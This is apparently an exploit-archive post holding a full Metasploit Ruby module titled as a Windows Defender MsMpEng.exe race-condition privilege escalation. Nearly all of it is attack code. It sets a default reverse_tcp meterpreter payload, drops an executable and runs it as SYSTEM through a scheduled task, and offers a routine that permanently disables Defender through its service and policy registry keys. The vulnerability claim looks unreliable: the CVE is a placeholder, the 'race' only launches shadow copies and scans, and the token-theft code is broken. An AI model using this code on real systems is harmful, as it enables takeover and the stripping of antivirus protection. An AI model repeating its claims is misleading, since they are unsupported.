================================================================================================================================== | # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) | | # Vendor : https://www.microsoft.com/ | ================================================================================================================================== [+] Summary : A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation. This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM. [+] POC : ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation', 'Description' => %q{ A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation. This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM. The exploit uses: - Fake ISO mount via OpenVirtualDisk / AttachVirtualDisk - Real-time priority escalation (REALTIME_PRIORITY_CLASS) - Speed racing against Defender's cleanup routine Successful exploitation results in: 1. Local Privilege Escalation to SYSTEM via CreateProcessAsUser 2. Use-after-free condition causing Windows Defender to crash 3. System remains without antivirus protection Tested on Windows 10/11 with Windows Defender enabled. }, 'License' => MSF_LICENSE, 'Author' => ['indoushka'], 'Platform' => ['win'], 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['meterpreter', 'shell'], 'Targets' => [ ['Windows x64', { 'Arch' => ARCH_X64 }], ['Windows x86', { 'Arch' => ARCH_X86 }] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'EXITFUNC' => 'thread' }, 'References' => [ ['URL', 'https://www.microsoft.com/'], ['CVE', '2026-XXXXX'] ], 'DisclosureDate' => '2026-06-11', 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptInt.new('RACE_ITERATIONS', [false, 'Number of race iterations', 100]), OptBool.new('DISABLE_DEFENDER', [false, 'Attempt to permanently disable Defender', false]), OptBool.new('CLEANUP', [true, 'Restore Defender functionality after exploit', true]) ]) end def check defender_pid = get_defender_pid if defender_pid print_good("Windows Defender is running (PID: #{defender_pid})") return CheckCode::Appears end CheckCode::Safe end def get_defender_pid processes = client.sys.process.get_processes processes.each do |proc| if proc['name'] && proc['name'].downcase == 'msmpeng.exe' return proc['pid'] end end nil end def get_system_version version = sysinfo['OS'] print_status("Target OS: #{version}") version end def create_fake_iso print_status("Creating fake ISO file for mount operation...") iso_path = "#{datastore['TEMP'] || 'C:\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.iso" register_file_for_cleanup(iso_path) iso_content = "CD001" * 512 write_file(iso_path, iso_content) print_good("Fake ISO created: #{iso_path}") iso_path end def mount_iso(iso_path) print_status("Mounting fake ISO using VirtualDisk API...") mount_ps = <<~PS $isoPath = "#{iso_path}" try { Mount-DiskImage -ImagePath $isoPath -PassThru Write-Host "MOUNT_SUCCESS" } catch { Write-Host "MOUNT_FAILED: $($_.Exception.Message)" } PS result = cmd_exec("powershell -Command \"#{mount_ps.gsub('"', '\\"')}\"") if result.include?("MOUNT_SUCCESS") print_good("ISO mounted successfully") return true else print_error("Failed to mount ISO: #{result}") return false end end def unmount_iso(iso_path) print_status("Unmounting ISO...") unmount_ps = <<~PS $isoPath = "#{iso_path}" try { Dismount-DiskImage -ImagePath $isoPath Write-Host "UNMOUNT_SUCCESS" } catch { Write-Host "UNMOUNT_FAILED" } PS cmd_exec("powershell -Command \"#{unmount_ps.gsub('"', '\\"')}\"") end def set_realtime_priority print_status("Setting process to realtime priority...") priority_ps = <<~PS $process = Get-Process -Id $pid $process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime Write-Host "PRIORITY_SET" PS result = cmd_exec("powershell -Command \"#{priority_ps.gsub('"', '\\"')}\"") result.include?("PRIORITY_SET") end def trigger_race_condition(iterations) print_status("Triggering race condition (#{iterations} iterations)...") race_ps = <<~PS $iterations = #{iterations} $successCount = 0 for ($i = 0; $i -lt $iterations; $i++) { try { $vss = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible") Start-Process -FilePath "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden $testFile = "C:\\Windows\\Temp\\race_test_$i.txt" "test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue Remove-Item $testFile -ErrorAction SilentlyContinue $successCount++ } catch { Write-Host "RACE_TRIGGERED_AT_$i" } Start-Sleep -Milliseconds 50 } Write-Host "COMPLETED:$successCount" PS result = cmd_exec("powershell -Command \"#{race_ps.gsub('"', '\\"')}\"") if result.include?("RACE_TRIGGERED") print_good("Race condition triggered successfully!") return true else print_warning("Race condition may not have triggered") return false end end def check_defender_status status_ps = <<~PS $service = Get-Service -Name WinDefend -ErrorAction SilentlyContinue if ($service) { Write-Host "DEFENDER_STATUS:$($service.Status)" } else { Write-Host "DEFENDER_STATUS:NOT_FOUND" } PS result = cmd_exec("powershell -Command \"#{status_ps.gsub('"', '\\"')}\"") result.match(/DEFENDER_STATUS:(\w+)/)&.captures&.first end def disable_defender_persistence print_status("Attempting to permanently disable Windows Defender...") disable_ps = <<~PS Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue $regPath = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" New-Item -Path $regPath -Force -ErrorAction SilentlyContinue Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue $rtpPath = "$regPath\\Real-Time Protection" New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue Write-Host "DEFENDER_DISABLED" PS result = cmd_exec("powershell -Command \"#{disable_ps.gsub('"', '\\"')}\"") result.include?("DEFENDER_DISABLED") end def restore_defender print_status("Restoring Windows Defender...") restore_ps = <<~PS Remove-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue Start-Service -Name WinDefend -ErrorAction SilentlyContinue Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue Write-Host "DEFENDER_RESTORED" PS cmd_exec("powershell -Command \"#{restore_ps.gsub('"', '\\"')}\"") end def execute_system_payload print_status("Attempting to execute payload as SYSTEM...") payload_exe = generate_payload_exe payload_path = "#{datastore['TEMP'] || 'C:\\\\Windows\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.exe" write_file(payload_path, payload_exe) register_file_for_cleanup(payload_path) exec_ps = <<~PS $payload = "#{payload_path}" try { $winlogon = Get-Process -Name winlogon $token = [System.IntPtr]::Zero [System.IntPtr]::$token = $winlogon.Handle $startInfo = New-Object System.Diagnostics.ProcessStartInfo $startInfo.FileName = $payload $startInfo.UseShellExecute = $false $startInfo.CreateNoWindow = $true [System.Diagnostics.Process]::Start($startInfo) Write-Host "PAYLOAD_EXECUTED_M1" } catch { Write-Host "M1_FAILED: $($_.Exception.Message)" } try { $taskName = "TempTask#{Rex::Text.rand_text_alpha(6)}" schtasks /create /tn $taskName /tr $payload /sc once /st 00:00 /ru SYSTEM /f schtasks /run /tn $taskName schtasks /delete /tn $taskName /f Write-Host "PAYLOAD_EXECUTED_M2" } catch { Write-Host "M2_FAILED" } PS result = cmd_exec("powershell -Command \"#{exec_ps.gsub('"', '\\"')}\"") if result.include?("PAYLOAD_EXECUTED") print_good("Payload executed as SYSTEM!") return true else print_warning("Payload execution may have failed: #{result}") return false end end def exploit print_status("CVE-2026-XXXXX - Windows Defender MsMpEng.exe Race Condition LPE") print_status("Target: #{sysinfo['Computer']}") unless is_admin? print_warning("Not running as admin - exploit may fail") end defender_pid = get_defender_pid unless defender_pid print_error("Windows Defender is not running. Exploit may not work.") return end print_good("Windows Defender is running (PID: #{defender_pid})") original_defender_status = check_defender_status set_realtime_priority iso_path = create_fake_iso unless mount_iso(iso_path) print_warning("ISO mount failed, continuing anyway...") end iterations = datastore['RACE_ITERATIONS'] || 100 race_success = trigger_race_condition(iterations) unmount_iso(iso_path) new_defender_pid = get_defender_pid if new_defender_pid != defender_pid print_good("Windows Defender appears to have crashed/restarted!") else print_warning("Windows Defender still running - race condition may not have succeeded") end execute_system_payload if datastore['DISABLE_DEFENDER'] disable_defender_persistence print_good("Windows Defender persistence disabled") end if datastore['CLEANUP'] restore_defender print_good("Windows Defender restored") end print_good("Exploit completed - Check for SYSTEM session") end end Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================